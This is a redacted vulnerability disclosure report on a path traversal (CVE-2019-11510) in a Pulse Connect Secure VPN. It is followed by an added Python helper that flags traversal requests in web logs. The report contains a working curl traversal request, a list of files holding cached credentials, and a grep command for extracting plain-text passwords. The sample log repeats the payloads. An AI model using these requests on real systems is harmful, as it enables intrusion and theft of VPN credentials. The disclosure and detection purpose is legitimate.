[CVE-2019-11510] Path Traversal on ████████ leads to leaked passwords, RCE, etc
Critical
Vulnerability Details
**Summary / Description:**
█████ is vulnerable to Path Traversal which can lead to remote code execution.
## Impact
Critical
## Step-by-step Reproduction Instructions
1. Run the following `cURL` command to get the file `/etc/hosts`
```
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
```
```
## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019
127.0.0.1 localhost
```
We can grab any other file on this system:
```
/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb
```
The VPN usernames and hashed passwords are stored in the `mtmp/system` file, but when users log into the application, it caches the plain-text password into `dataa/data.mdb`.
```
grep 'password@9' data.mdb -a
```
will get you a load of plain-text passwords
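Added example, not part of the original report: a small Python triage helper for web access logs that flags request lines whose raw path climbs above the web root before any normalisation, and separately marks the exact request shape shown above (traversal from `/dana-na/` through the `guacamole` path, with that path repeated in the query string). The sample log lines are constructed for this example.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample request lines (not from the original report): the first,
# second and last mirror the traversal shape above, the others are benign.
SAMPLE_LOG = """\
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1
GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/ HTTP/1.1
GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
GET /dana/home/index.cgi HTTP/1.1
GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
"""

REQUEST_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def escapes_root(raw_path):
    """True if the decoded path climbs above '/' at any point.
    Segments are walked one by one (cURL's --path-as-is sends '..' unnormalised)
    because posixpath.normpath silently clamps '/..' at '/' and would hide it."""
    depth = 0
    for seg in unquote(raw_path).split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ('', '.'):
            depth += 1
    return False

def classify(line):
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    decoded = unquote(path)
    guac = '/dana/html5acc/guacamole/'
    return {
        'method': m.group('method'),
        'raw_path': path,
        'resolved': normpath(decoded),          # file the server would end up reading
        'traversal': escapes_root(path),
        # the advisory's request shape: root escape via the guacamole path,
        # with the same guacamole path echoed in the query string
        'cve_2019_11510_shape': escapes_root(path) and guac in decoded and guac in unquote(query),
    }

def flagged_requests(log_text):
    """Return the classified records for every line that escapes the web root."""
    return [r for r in map(classify, log_text.splitlines()) if r and r['traversal']]
```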
## Product, Version, and Configuration (If applicable)
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
## Suggested Mitigation/Remediation Actions
Update the Pulse Connect Secure VPN
## Impact
Critical, an attacker can get code execution with this vulnerability.
## References:
https://hackerone.com/reports/591295
Thanks,
Corben (@cdl)
Report Stats
- Report ID: 671857
- State: Closed
- Substate: resolved
- Upvotes: 9